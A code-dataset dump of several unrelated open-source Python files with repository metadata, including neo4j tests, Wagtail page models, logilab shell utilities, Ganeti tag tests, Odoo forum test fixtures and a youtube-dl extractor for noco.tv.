               rel['since'],
               rel.end['name'],
               )
        self.assertEquals(message, "Steve Brook 12th of July 2012 Poplar BluffSteve Brook 12th of July 2012 Poplar Bluff")
        a_node = steven
        # START SNIPPET: accessingRelationships
        # All relationships on a node
        for rel in a_node.relationships:
            pass
        # Incoming relationships
        for rel in a_node.relationships.incoming:
            pass
        # Outgoing relationships
        for rel in a_node.relationships.outgoing:
            pass
        # Relationships of a specific type
        for rel in a_node.mayor_of:
            pass
        # Incoming relationships of a specific type
        for rel in a_node.mayor_of.incoming:
            pass
        # Outgoing relationships of a specific type
        for rel in a_node.mayor_of.outgoing:
            pass
        # END SNIPPET: accessingRelationships
        self.assertEquals(len(steven.relationships), 3)
        self.assertEquals(len(steven.relationships.incoming), 1)
        self.assertEquals(len(steven.relationships.outgoing), 2)
        self.assertEquals(len(steven.likes), 1)
        self.assertEquals(len(steven.likes.incoming), 1)
        self.assertEquals(len(steven.likes.outgoing), 0)
    def test_relationship_attributes(self):
        db = self.graphdb
        with db.transaction:
            source = self.graphdb.node()
            target = self.graphdb.node()
            # Create a relationship of type "related_to"
            relationship = source.related_to(target)
        # START SNIPPET: relationshipAttributes
        relationship_type = relationship.type
        start_node = relationship.start
        end_node = relationship.end
        # END SNIPPET: relationshipAttributes
        rel = relationship
        self.assertEquals(rel.type.name(), 'related_to')
        self.assertEquals(rel.start, source)
        self.assertEquals(rel.end, target)
    def test_get_relationship_by_id(self):
        db = self.graphdb
        with db.transaction:
            source = self.graphdb.node()
            target = self.graphdb.node()
            rel = source.Knows(target)
            a_relationship_id = rel.id
        # START SNIPPET: getRelationshipById
        the_relationship = db.relationship[a_relationship_id]
        # END SNIPPET: getRelationshipById
        self.assertNotEqual(the_relationship, None)
    def test_delete_relationship(self):
        db = self.graphdb
        # START SNIPPET: deleteRelationship
        with db.transaction:
            # Create a relationship
            source = db.node()
            target = db.node()
            rel = source.Knows(target)
            # Delete it
            rel.delete()
        # END SNIPPET: deleteRelationship
        try:
            self.graphdb.relationship[rel.id]
            self.assertTrue(False)
        except Exception, e:
            self.assertTrue(isinstance(e, KeyError))
    def test_delete_relationship_by_id(self):
        db = self.graphdb
        with db.transaction:
            node1 = self.graphdb.node()
            node2 = self.graphdb.node()
            rel = node1.Knows(node2)
            some_relationship_id = rel.id
        # START SNIPPET: deleteByIdRelationship
        with db.transaction:
            del db.relationship[some_relationship_id]
        # END SNIPPET: deleteByIdRelationship
        try:
            self.graphdb.relationship[rel.id]
            self.assertTrue(False)
        except Exception, e:
            self.assertTrue(isinstance(e, KeyError))
if __name__ == '__main__':
    # Run this module's tests via the project's unittest wrapper.
    unit_tests.unittest.main()
|
neo4j-contrib/python-embedded
|
src/test/python/core.py
|
Python
|
gpl-3.0
| 15,319
|
from __future__ import absolute_import, unicode_literals
from basic_site import models as basic_site_models
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from wagtail.wagtailadmin.edit_handlers import (FieldPanel, MultiFieldPanel,
PageChooserPanel)
from wagtail.wagtailcore.models import Page
from blog.models import BlogIndexPage, BlogPage
from core.mixin import FeatureMixin, PaginatedListPageMixin
from micro.models import MicroPage
class LindBasePage(Page, basic_site_models.BasePage, FeatureMixin):
    # Basic content page combining Wagtail's Page with the project's
    # BasePage body field and the FeatureMixin promote panels.
    def __init__(self, *args, **kwargs):
        """Make the ``first_published_at`` field editable in the admin.

        NOTE(review): ``self._meta.fields`` contains field objects shared by
        the whole model class, so this mutates class-wide state on every
        instantiation -- presumably intentional, but verify.
        """
        super(LindBasePage, self).__init__(*args, **kwargs)
        for field in self._meta.fields:
            if field.name == 'first_published_at':
                field.editable = True
                field.blank = True
    content_panels = Page.content_panels + [
        FieldPanel('body', classname="full"),
    ]
    promote_panels = Page.promote_panels + FeatureMixin.promote_panels
    settings_panels = [FieldPanel('first_published_at'), ] + Page.settings_panels
class PageList(models.Model):
    """Abstract mixin that yields the site's live blog and basic pages,
    newest first."""

    class Meta:
        abstract = True

    def pages(self):
        """Return live BlogPage/LindBasePage pages ordered by publish date."""
        blog_ct = ContentType.objects.get_for_model(BlogPage)
        base_ct = ContentType.objects.get_for_model(LindBasePage)
        live_pages = Page.objects.live().filter(
            models.Q(content_type=blog_ct) | models.Q(content_type=base_ct)
        )
        return live_pages.order_by('-first_published_at')
class SiteIndexPage(PaginatedListPageMixin, Page, PageList):
    """Paginated index page listing every live blog post and basic page."""

    subpage_types = [
        LindBasePage,
        BlogIndexPage,
        MicroPage,
    ]
    posts_per_page = models.IntegerField(default=10)
    counter_field_name = 'posts_per_page'
    counter_context_name = 'posts'

    @property
    def subpages(self):
        """Return every listed page resolved to its specific subclass."""
        return [
            page.content_type.get_object_for_this_type(id=page.id)
            for page in self.pages().all()
        ]
# NOTE(review): assigned outside the class body, presumably to replace
# (not extend) the inherited Page.content_panels -- verify.
SiteIndexPage.content_panels = [
    FieldPanel('title', classname="full title"),
    FieldPanel('posts_per_page'),
]
@python_2_unicode_compatible
class HomePage(Page, PageList):
    """Site home page: one featured page plus a feed of the latest pages."""

    subpage_types = [
        LindBasePage,
        BlogIndexPage,
        SiteIndexPage,
        MicroPage,
    ]
    featured_item = models.ForeignKey(
        'wagtailcore.Page',
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name='+'
    )
    number_homepage_items = models.IntegerField(default=3, verbose_name="Items on Homepage")

    def latest(self):
        """Return the newest pages for the feed, excluding the featured one.

        ``featured_item`` is nullable (and SET_NULL on delete); the original
        implementation dereferenced ``self.featured_item.pk`` unconditionally
        and raised AttributeError whenever no featured item was set.
        """
        pages = self.pages()
        if self.featured_item is not None:
            pages = pages.exclude(pk=self.featured_item.pk)
        return pages[:self.number_homepage_items]

    def more_link(self):
        """Return True when there are more pages than fit on the homepage.

        The original only assigned the local ``more_link`` inside the ``if``
        branch and then returned it unconditionally, raising
        UnboundLocalError whenever there were no extra pages.  (The class
        attribute ``more_link = False`` could never act as a fallback: the
        method definition shadowed it, so it has been removed.)
        """
        return len(self.pages()) > self.number_homepage_items

    def __str__(self):
        return self.title

    content_panels = Page.content_panels + [
        MultiFieldPanel(
            [
                PageChooserPanel("featured_item", "wagtailcore.Page"),
            ],
            heading="Main Feature"
        ),
        MultiFieldPanel(
            [
                FieldPanel("number_homepage_items"),
            ],
            heading="Homepage Feed"
        ),
    ]
|
OpenCanada/lindinitiative
|
core/models.py
|
Python
|
mit
| 3,564
|
# -*- coding: utf-8 -*-
from .api_server import API

# Module-level application instance, imported by whatever process serves
# the web hooks.
app = API()
|
business-factory/captain-hook
|
hooks/app.py
|
Python
|
mit
| 66
|
# copyright 2003-2011 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This file is part of logilab-common.
#
# logilab-common is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 2.1 of the License, or (at your option) any
# later version.
#
# logilab-common is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-common. If not, see <http://www.gnu.org/licenses/>.
"""shell/term utilities, useful to write some python scripts instead of shell
scripts.
"""
__docformat__ = "restructuredtext en"
import os
import glob
import shutil
import stat
import sys
import tempfile
import time
import fnmatch
import errno
import string
import random
from os.path import exists, isdir, islink, basename, join
from logilab.common import STD_BLACKLIST, _handle_blacklist
from logilab.common.compat import raw_input
from logilab.common.compat import str_to_bytes
try:
    from logilab.common.proc import ProcInfo, NoSuchProcess
except ImportError:
    # windows platform: logilab.common.proc is unix-only, so provide stubs
    # that make every pid look dead (acquire_lock will then simply reclaim
    # any existing lock file instead of inspecting its owner process).
    class NoSuchProcess(Exception): pass

    def ProcInfo(pid):
        raise NoSuchProcess()
class tempdir(object):
    """Context manager creating a fresh temporary directory.

    The directory is removed on exit whether or not the body raised;
    exceptions are propagated (``__exit__`` is true only when no
    exception occurred).
    """

    def __enter__(self):
        created = tempfile.mkdtemp()
        self.path = created
        return created

    def __exit__(self, exctype, value, traceback):
        # Clean up unconditionally, then let any exception propagate.
        shutil.rmtree(self.path)
        if traceback is None:
            return True
        return False
class pushd(object):
    """Context manager that chdirs into *directory* and restores the
    previous working directory on exit (like shell ``pushd``/``popd``)."""

    def __init__(self, directory):
        self.directory = directory

    def __enter__(self):
        # Remember where we were so __exit__ can go back.
        self.cwd = os.getcwd()
        os.chdir(self.directory)
        return self.directory

    def __exit__(self, exctype, value, traceback):
        os.chdir(self.cwd)
def chown(path, login=None, group=None):
    """Same as `os.chown` but accepting a user login or group name as
    argument. An omitted login or group is left unchanged (passed to
    os.chown as -1).

    Note: you must own the file to chown it (or be root), otherwise
    OSError is raised.
    """
    uid = gid = -1
    if login is not None:
        try:
            uid = int(login)
        except ValueError:
            # not numeric: resolve the login name through the passwd db
            import pwd  # Platforms: Unix
            uid = pwd.getpwnam(login).pw_uid
    if group is not None:
        try:
            gid = int(group)
        except ValueError:
            import grp
            gid = grp.getgrnam(group).gr_gid
    os.chown(path, uid, gid)
def mv(source, destination, _action=shutil.move):
    """A shell-like mv, supporting wildcards.

    `source` may be a glob pattern; when it matches several files,
    `destination` must be an existing directory. Raises OSError when
    nothing matches or when the move itself fails.
    """
    sources = glob.glob(source)
    if len(sources) > 1:
        assert isdir(destination)
        for filename in sources:
            _action(filename, join(destination, basename(filename)))
    else:
        try:
            source = sources[0]
        except IndexError:
            raise OSError('No file matching %s' % source)
        # moving a single file into an existing directory keeps its basename
        # (isdir implies existence, so the previous `and exists(...)` was
        # redundant)
        if isdir(destination):
            destination = join(destination, basename(source))
        try:
            _action(source, destination)
        except OSError as ex:
            # `except ... as ...` (valid since Python 2.6) replaces the
            # Python-2-only `except OSError, ex` form
            raise OSError('Unable to move %r to %r (%s)' % (
                source, destination, ex))
def rm(*files):
    """A shell-like rm, supporting wildcards.

    Symlinks are unlinked (never followed), directories are removed
    recursively, and plain files are deleted.
    """
    for pattern in files:
        for path in glob.glob(pattern):
            # check islink first: a symlink to a directory must be
            # unlinked, not recursively deleted
            if islink(path):
                os.remove(path)
            elif isdir(path):
                shutil.rmtree(path)
            else:
                os.remove(path)
def cp(source, destination):
    """A shell-like cp, supporting wildcards.

    Delegates to `mv` with the move action swapped for `shutil.copy`,
    so it inherits mv's glob handling and error reporting.
    """
    mv(source, destination, _action=shutil.copy)
def find(directory, exts, exclude=False, blacklist=STD_BLACKLIST):
    """Recursively find files ending with the given extensions from the directory.

    :type directory: str
    :param directory:
      directory where the search should start

    :type exts: basestring or list or tuple
    :param exts:
      extensions or lists or extensions to search

    :type exclude: boolean
    :param exclude:
      if this argument is True, returning files NOT ending with the given
      extensions

    :type blacklist: list or tuple
    :param blacklist:
      optional list of files or directory to ignore, default to the value of
      `logilab.common.STD_BLACKLIST`

    :rtype: list
    :return:
      the list of all matching files
    """
    if isinstance(exts, basestring):
        exts = (exts,)
    # pick the matcher once, outside the walk
    if exclude:
        def match(filename, exts):
            for ext in exts:
                if filename.endswith(ext):
                    return False
            return True
    else:
        def match(filename, exts):
            for ext in exts:
                if filename.endswith(ext):
                    return True
            return False
    files = []
    for dirpath, dirnames, filenames in os.walk(directory):
        # prunes blacklisted entries from dirnames/filenames in place so
        # os.walk does not descend into them
        _handle_blacklist(blacklist, dirnames, filenames)
        # don't append files if the directory is blacklisted
        dirname = basename(dirpath)
        if dirname in blacklist:
            continue
        files.extend([join(dirpath, f) for f in filenames if match(f, exts)])
    return files
def globfind(directory, pattern, blacklist=STD_BLACKLIST):
    """Recursively finds files matching glob `pattern` under `directory`.

    This is an alternative to `logilab.common.shellutils.find`.

    :type directory: str
    :param directory:
      directory where the search should start

    :type pattern: basestring
    :param pattern:
      the glob pattern (e.g *.py, foo*.py, etc.)

    :type blacklist: list or tuple
    :param blacklist:
      optional list of files or directory to ignore, default to the value of
      `logilab.common.STD_BLACKLIST`

    :rtype: iterator
    :return:
      iterator over the list of all matching files
    """
    for curdir, dirnames, filenames in os.walk(directory):
        # prunes blacklisted entries in place so os.walk skips them
        _handle_blacklist(blacklist, dirnames, filenames)
        for fname in fnmatch.filter(filenames, pattern):
            yield join(curdir, fname)
def unzip(archive, destdir):
    """Extract the zip file `archive` into `destdir` (created if missing).

    Fixes over the previous version: archives that omit explicit
    directory entries (or repeat them) no longer crash -- parent
    directories are created on demand -- and the output file handle is
    closed even when a write fails.

    NOTE(review): entry names are joined to destdir unchecked, so a
    malicious archive containing '..' components could escape destdir
    (zip-slip); only use on trusted archives.
    """
    import zipfile
    if not exists(destdir):
        os.mkdir(destdir)
    zfobj = zipfile.ZipFile(archive)
    for name in zfobj.namelist():
        target = join(destdir, name)
        if name.endswith('/'):
            # explicit directory entry
            if not exists(target):
                os.makedirs(target)
        else:
            # some archives have no directory entries at all: make sure
            # the parent directory exists before writing the file
            parent = os.path.dirname(target)
            if parent and not exists(parent):
                os.makedirs(parent)
            outfile = open(target, 'wb')
            try:
                outfile.write(zfobj.read(name))
            finally:
                outfile.close()
class Execute:
    """This is a deadlock safe version of popen2 (no stdin), that returns
    an object with errorlevel, out and err.
    """
    # NOTE(review): `command` is interpolated into a shell line unquoted --
    # never pass untrusted input here; prefer the subprocess module in new
    # code.

    def __init__(self, command):
        outfile = tempfile.mktemp()
        errfile = tempfile.mktemp()
        # Redirect both streams to temp files instead of pipes, so a chatty
        # command cannot deadlock on a full pipe buffer. On Unix, os.system
        # returns the wait status; shifting by 8 extracts the exit code.
        self.status = os.system("( %s ) >%s 2>%s" %
                                (command, outfile, errfile)) >> 8
        self.out = open(outfile, "r").read()
        self.err = open(errfile, "r").read()
        os.remove(outfile)
        os.remove(errfile)
def acquire_lock(lock_file, max_try=10, delay=10, max_delay=3600):
    """Acquire a lock represented by a file on the file system

    If the process written in lock file doesn't exist anymore, we remove the
    lock file immediately

    If age of the lock_file is greater than max_delay, then we raise a UserWarning
    """
    count = abs(max_try)
    while count:
        try:
            # O_EXCL|O_CREAT makes creation atomic: exactly one contender
            # can create the file. The owner's pid is stored inside it.
            fd = os.open(lock_file, os.O_EXCL | os.O_RDWR | os.O_CREAT)
            os.write(fd, str_to_bytes(str(os.getpid())) )
            os.close(fd)
            return True
        except OSError, e:
            if e.errno == errno.EEXIST:
                # Somebody else holds the lock: inspect the holder.
                try:
                    fd = open(lock_file, "r")
                    pid = int(fd.readline())
                    pi = ProcInfo(pid)
                    age = (time.time() - os.stat(lock_file)[stat.ST_MTIME])
                    if age / max_delay > 1 :
                        raise UserWarning("Command '%s' (pid %s) has locked the "
                                          "file '%s' for %s minutes"
                                          % (pi.name(), pid, lock_file, age/60))
                except UserWarning:
                    raise
                except NoSuchProcess:
                    # holder process is dead: reclaim the stale lock file
                    os.remove(lock_file)
                except Exception:
                    # The try block is not essential. can be skipped.
                    # Note: ProcInfo object is only available for linux
                    # process information are not accessible...
                    # or lock_file is no more present...
                    pass
            else:
                raise
            count -= 1
            time.sleep(delay)
    else:
        raise Exception('Unable to acquire %s' % lock_file)
def release_lock(lock_file):
    """Release a lock represented by a file on the file system."""
    # os.unlink is an alias of os.remove
    os.unlink(lock_file)
class ProgressBar(object):
    """A simple text progression bar."""

    def __init__(self, nbops, size=20, stream=sys.stdout, title=''):
        # _fstr starts with '\r' so every refresh redraws the same
        # terminal line in place.
        if title:
            self._fstr = '\r%s [%%-%ss]' % (title, int(size))
        else:
            self._fstr = '\r[%%-%ss]' % int(size)
        self._stream = stream
        self._total = nbops  # total number of expected operations
        self._size = size  # bar width in characters
        self._current = 0  # operations done so far
        self._progress = 0  # bar cells currently filled
        self._current_text = None  # optional text displayed after the bar
        self._last_text_write_size = 0  # width needed to blank stale text

    def _get_text(self):
        return self._current_text

    def _set_text(self, text=None):
        # only repaint when the text actually changed
        if text != self._current_text:
            self._current_text = text
            self.refresh()

    def _del_text(self):
        self.text = None

    text = property(_get_text, _set_text, _del_text)

    def update(self, offset=1, exact=False):
        """Move FORWARD to new cursor position (cursor will never go backward).

        :offset: fraction of ``size``

        :exact:

          - False: offset relative to current cursor position if True
          - True: offset as an asbsolute position
        """
        if exact:
            self._current = offset
        else:
            self._current += offset

        progress = int((float(self._current)/float(self._total))*self._size)
        # never repaint for a smaller (backward) position
        if progress > self._progress:
            self._progress = progress
            self.refresh()

    def refresh(self):
        """Refresh the progression bar display."""
        self._stream.write(self._fstr % ('.' * min(self._progress, self._size)) )
        if self._last_text_write_size or self._current_text:
            # left-pad to the previous text's width so a shorter new text
            # overwrites the old one completely
            template = ' %%-%is' % (self._last_text_write_size)
            text = self._current_text
            if text is None:
                text = ''
            self._stream.write(template % text)
            self._last_text_write_size = len(text.rstrip())
        self._stream.flush()

    def finish(self):
        # terminate the in-place line
        self._stream.write('\n')
        self._stream.flush()
class DummyProgressBar(object):
    """No-op stand-in for ProgressBar, used when progress display is
    disabled; accepts the same calls and does nothing.

    Fixes: the slots declaration was misspelled ``__slot__`` (which had no
    effect), and ``update`` took no arguments, so callers passing
    ProgressBar.update's offset/exact arguments would crash.
    """
    __slots__ = ('text',)

    def refresh(self):
        pass

    def update(self, offset=1, exact=False):
        # mirror ProgressBar.update's signature so call sites are
        # interchangeable
        pass

    def finish(self):
        pass
_MARKER = object()  # sentinel distinguishing "argument not supplied" from None

class progress(object):
    """Context manager yielding a ProgressBar (or a no-op DummyProgressBar
    when ``enabled`` is False) and finishing it on exit."""

    def __init__(self, nbops=_MARKER, size=_MARKER, stream=_MARKER, title=_MARKER, enabled=True):
        self.nbops = nbops
        self.size = size
        self.stream = stream
        self.title = title
        self.enabled = enabled

    def __enter__(self):
        if self.enabled:
            # forward only the explicitly supplied arguments so that
            # ProgressBar's own defaults apply for the rest
            kwargs = {}
            for attr in ('nbops', 'size', 'stream', 'title'):
                value = getattr(self, attr)
                if value is not _MARKER:
                    kwargs[attr] = value
            self.pb = ProgressBar(**kwargs)
        else:
            self.pb = DummyProgressBar()
        return self.pb

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.pb.finish()
class RawInput(object):
    """Interactive question helper with pluggable input/output callables
    (mainly to ease testing: pass `input` and `printer` stubs)."""

    def __init__(self, input=None, printer=None):
        self._input = input or raw_input
        self._print = printer

    def ask(self, question, options, default):
        """Ask `question`, letting the user pick one of `options` by typing
        any unambiguous prefix; `default` (which must be in `options`) is
        returned on an empty answer. Raises Exception after 3 bad answers.
        """
        assert default in options
        choices = []
        for option in options:
            # the default option is capitalized in the prompt, e.g. Y(es)/n(o)
            if option == default:
                label = option[0].upper()
            else:
                label = option[0].lower()
            if len(option) > 1:
                label += '(%s)' % option[1:].lower()
            choices.append((option, label))
        prompt = "%s [%s]: " % (question,
                                '/'.join([opt[1] for opt in choices]))
        tries = 3
        while tries > 0:
            answer = self._input(prompt).strip().lower()
            if not answer:
                return default
            possible = [option for option, label in choices
                        if option.lower().startswith(answer)]
            if len(possible) == 1:
                return possible[0]
            elif len(possible) == 0:
                msg = '%s is not an option.' % answer
            else:
                msg = ('%s is an ambiguous answer, do you mean %s ?' % (
                    answer, ' or '.join(possible)))
            if self._print:
                self._print(msg)
            else:
                # print() call instead of the Python-2-only `print msg`
                # statement: valid on both Python 2 and 3
                print(msg)
            tries -= 1
        raise Exception('unable to get a sensible answer')

    def confirm(self, question, default_is_yes=True):
        """Ask a yes/no `question`; return True when the answer is yes."""
        default = default_is_yes and 'y' or 'n'
        answer = self.ask(question, ('y', 'n'), default)
        return answer == 'y'
ASK = RawInput()  # module-level helper bound to the real raw_input/print
def getlogin():
    """avoid using os.getlogin() because of strange tty / stdin problems
    (man 3 getlogin)
    Another solution would be to use $LOGNAME, $USER or $USERNAME
    """
    if sys.platform == 'win32':
        return os.environ['USERNAME']
    # Unix: resolve the login name from the effective uid instead
    import pwd  # Platforms: Unix
    return pwd.getpwuid(os.getuid())[0]
def generate_password(length=8, vocab=string.ascii_letters + string.digits):
    """Dumb password generation function: `length` characters drawn
    uniformly (with replacement) from `vocab`.

    NOTE(review): uses the non-cryptographic `random` module -- do not use
    the result for anything security sensitive (use `secrets` instead).
    """
    # range instead of the Python-2-only xrange, and a single join instead
    # of repeated string concatenation
    return ''.join(random.choice(vocab) for _ in range(length))
|
pronto/dotfiles
|
.vim/pylibs/logilab/common/shellutils.py
|
Python
|
bsd-2-clause
| 14,284
|
#
#
# Copyright (C) 2007 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Tags related QA tests.
"""
from ganeti import constants
import qa_rapi
from qa_utils import AssertCommand
# Disposable tag names used by the QA run, plus a regex matching all of
# them (exercised by the search-tags test below).
_TEMP_TAG_NAMES = ["TEMP-Ganeti-QA-Tag%d" % i for i in range(3)]
_TEMP_TAG_RE = r'^TEMP-Ganeti-QA-Tag\d+$'

# Maps each tag-kind constant to the gnt-* command managing that kind.
_KIND_TO_COMMAND = {
  constants.TAG_CLUSTER: "gnt-cluster",
  constants.TAG_NODE: "gnt-node",
  constants.TAG_INSTANCE: "gnt-instance",
  constants.TAG_NODEGROUP: "gnt-group",
  }
def _TestTags(kind, name):
  """Exercise the tag subcommands (add/list/search/remove) for one object
  kind, then the RAPI equivalents when RAPI testing is enabled.

  """
  base = _KIND_TO_COMMAND[kind]
  # cluster-level tag commands take no object-name argument
  suffix = [] if kind == constants.TAG_CLUSTER else [name]

  def cmdfn(subcmd):
    return [base, subcmd] + suffix

  commands = [
    cmdfn("add-tags") + _TEMP_TAG_NAMES,
    cmdfn("list-tags"),
    ["gnt-cluster", "search-tags", _TEMP_TAG_RE],
    cmdfn("remove-tags") + _TEMP_TAG_NAMES,
    ]
  for cmd in commands:
    AssertCommand(cmd)

  if qa_rapi.Enabled():
    qa_rapi.TestTags(kind, name, _TEMP_TAG_NAMES)
def TestClusterTags():
  """gnt-cluster tags"""
  # cluster tags are global, so no object name is needed
  _TestTags(constants.TAG_CLUSTER, "")
def TestNodeTags(node):
  """gnt-node tags"""
  # nodes are addressed by their primary name in the QA config dict
  _TestTags(constants.TAG_NODE, node["primary"])
def TestGroupTags(group):
  """gnt-group tags"""
  _TestTags(constants.TAG_NODEGROUP, group)
def TestInstanceTags(instance):
  """gnt-instance tags"""
  _TestTags(constants.TAG_INSTANCE, instance["name"])
|
dblia/nosql-ganeti
|
qa/qa_tags.py
|
Python
|
gpl-2.0
| 2,042
|
# -*- coding: utf-8 -*-
from openerp.tests import common
# Karma thresholds/rewards used to configure the test forum below:
# *_own/_all = acting on one's own vs. anybody's post; upv/dwv = casting an
# up/down vote; gen_* = karma generated on the author when their post is
# created or voted on.
KARMA = {
    'ask': 5, 'ans': 10,
    'com_own': 5, 'com_all': 10,
    'com_conv_all': 50,
    'upv': 5, 'dwv': 10,
    'edit_own': 10, 'edit_all': 20,
    'close_own': 10, 'close_all': 20,
    'unlink_own': 10, 'unlink_all': 20,
    'gen_que_new': 1, 'gen_que_upv': 5, 'gen_que_dwv': -10,
    'gen_ans_upv': 10, 'gen_ans_dwv': -20,
}
class TestForumCommon(common.TransactionCase):
    """Shared fixture for forum tests: three zero-karma users (employee,
    portal, public), a forum configured from KARMA, and one question with
    one answer."""

    def setUp(self):
        super(TestForumCommon, self).setUp()

        Forum = self.env['forum.forum']
        Post = self.env['forum.post']

        # Test users -- created with no_reset_password so no reset email is
        # sent during test setup. All start at karma 0 so individual tests
        # grant exactly the karma they need.
        TestUsersEnv = self.env['res.users'].with_context({'no_reset_password': True})
        group_employee_id = self.ref('base.group_user')
        group_portal_id = self.ref('base.group_portal')
        group_public_id = self.ref('base.group_public')
        self.user_employee = TestUsersEnv.create({
            'name': 'Armande Employee',
            'login': 'Armande',
            'alias_name': 'armande',
            'email': 'armande.employee@example.com',
            'karma': 0,
            'groups_id': [(6, 0, [group_employee_id])]
        })
        self.user_portal = TestUsersEnv.create({
            'name': 'Beatrice Portal',
            'login': 'Beatrice',
            'alias_name': 'beatrice',
            'email': 'beatrice.employee@example.com',
            'karma': 0,
            'groups_id': [(6, 0, [group_portal_id])]
        })
        self.user_public = TestUsersEnv.create({
            'name': 'Cedric Public',
            'login': 'Cedric',
            'alias_name': 'cedric',
            'email': 'cedric.employee@example.com',
            'karma': 0,
            'groups_id': [(6, 0, [group_public_id])]
        })

        # Test forum -- thresholds come from KARMA; the answer-accept
        # settings are set to 9999 so accepting answers stays out of reach
        # unless a test raises karma explicitly.
        self.forum = Forum.create({
            'name': 'TestForum',
            'karma_ask': KARMA['ask'],
            'karma_answer': KARMA['ans'],
            'karma_comment_own': KARMA['com_own'],
            'karma_comment_all': KARMA['com_all'],
            'karma_answer_accept_own': 9999,
            'karma_answer_accept_all': 9999,
            'karma_upvote': KARMA['upv'],
            'karma_downvote': KARMA['dwv'],
            'karma_edit_own': KARMA['edit_own'],
            'karma_edit_all': KARMA['edit_all'],
            'karma_close_own': KARMA['close_own'],
            'karma_close_all': KARMA['close_all'],
            'karma_unlink_own': KARMA['unlink_own'],
            'karma_unlink_all': KARMA['unlink_all'],
            'karma_comment_convert_all': KARMA['com_conv_all'],
            'karma_gen_question_new': KARMA['gen_que_new'],
            'karma_gen_question_upvote': KARMA['gen_que_upv'],
            'karma_gen_question_downvote': KARMA['gen_que_dwv'],
            'karma_gen_answer_upvote': KARMA['gen_ans_upv'],
            'karma_gen_answer_downvote': KARMA['gen_ans_dwv'],
            'karma_gen_answer_accept': 9999,
            'karma_gen_answer_accepted': 9999,
        })
        # A question with one tag...
        self.post = Post.create({
            'name': 'TestQuestion',
            'content': 'I am not a bird.',
            'forum_id': self.forum.id,
            'tag_ids': [(0, 0, {'name': 'Tag0', 'forum_id': self.forum.id})]
        })
        # ...and one answer attached to it via parent_id.
        self.answer = Post.create({
            'name': 'TestAnswer',
            'content': 'I am an anteater.',
            'forum_id': self.forum.id,
            'parent_id': self.post.id,
        })
|
mycodeday/crm-platform
|
website_forum/tests/common.py
|
Python
|
gpl-3.0
| 3,442
|
# encoding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
unified_strdate,
compat_str,
)
class NocoIE(InfoExtractor):
    """Extractor for noco.tv emissions (most media require a noco account)."""

    _VALID_URL = r'http://(?:(?:www\.)?noco\.tv/emission/|player\.noco\.tv/\?idvideo=)(?P<id>\d+)'
    _TEST = {
        'url': 'http://noco.tv/emission/11538/nolife/ami-ami-idol-hello-france/',
        'md5': '0a993f0058ddbcd902630b2047ef710e',
        'info_dict': {
            'id': '11538',
            'ext': 'mp4',
            'title': 'Ami Ami Idol - Hello! France',
            'description': 'md5:4eaab46ab68fa4197a317a88a53d3b86',
            'upload_date': '20140412',
            'uploader': 'Nolife',
            'uploader_id': 'NOL',
            'duration': 2851.2,
        },
        'skip': 'Requires noco account',
    }

    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        video_id = mobj.group('id')

        # The medias endpoint lists the available qualities; each quality
        # then needs its own file call to resolve the actual URL.
        medias = self._download_json(
            'https://api.noco.tv/1.0/video/medias/%s' % video_id, video_id, 'Downloading video JSON')

        formats = []

        for fmt in medias['fr']['video_list']['default']['quality_list']:
            format_id = fmt['quality_key']

            file = self._download_json(
                'https://api.noco.tv/1.0/video/file/%s/fr/%s' % (format_id.lower(), video_id),
                video_id, 'Downloading %s video JSON' % format_id)

            file_url = file['file']
            if not file_url:
                continue

            # the API signals access errors in-band via a 'forbidden' URL
            # plus a popmessage payload
            if file_url == 'forbidden':
                raise ExtractorError(
                    '%s returned error: %s - %s' % (
                        self.IE_NAME, file['popmessage']['title'], file['popmessage']['message']),
                    expected=True)

            formats.append({
                'url': file_url,
                'format_id': format_id,
                'width': fmt['res_width'],
                'height': fmt['res_lines'],
                'abr': fmt['audiobitrate'],
                'vbr': fmt['videobitrate'],
                'filesize': fmt['filesize'],
                'format_note': fmt['quality_name'],
                'preference': fmt['priority'],
            })

        self._sort_formats(formats)

        # Metadata comes from a separate show endpoint.
        show = self._download_json(
            'https://api.noco.tv/1.0/shows/show/%s' % video_id, video_id, 'Downloading show JSON')[0]

        upload_date = unified_strdate(show['indexed'])
        uploader = show['partner_name']
        uploader_id = show['partner_key']
        duration = show['duration_ms'] / 1000.0
        thumbnail = show['screenshot']

        # Title is assembled as "<family> #<episode_number> - <episode>",
        # preferring translated (_TT) over original (_OT) fields.
        episode = show.get('show_TT') or show.get('show_OT')
        family = show.get('family_TT') or show.get('family_OT')
        episode_number = show.get('episode_number')

        title = ''
        if family:
            title += family
        if episode_number:
            title += ' #' + compat_str(episode_number)
        if episode:
            title += ' - ' + episode

        description = show.get('show_resume') or show.get('family_resume')

        return {
            'id': video_id,
            'title': title,
            'description': description,
            'thumbnail': thumbnail,
            'upload_date': upload_date,
            'uploader': uploader,
            'uploader_id': uploader_id,
            'duration': duration,
            'formats': formats,
        }
|
huangciyin/youtube-dl
|
youtube_dl/extractor/noco.py
|
Python
|
unlicense
| 3,451
|
#
# This plugin is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License Version 2 as
# published by the Free Software Foundation. You may not use, modify or
# distribute this program under any other version of the GNU General
# Public License.
#
# This plugin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
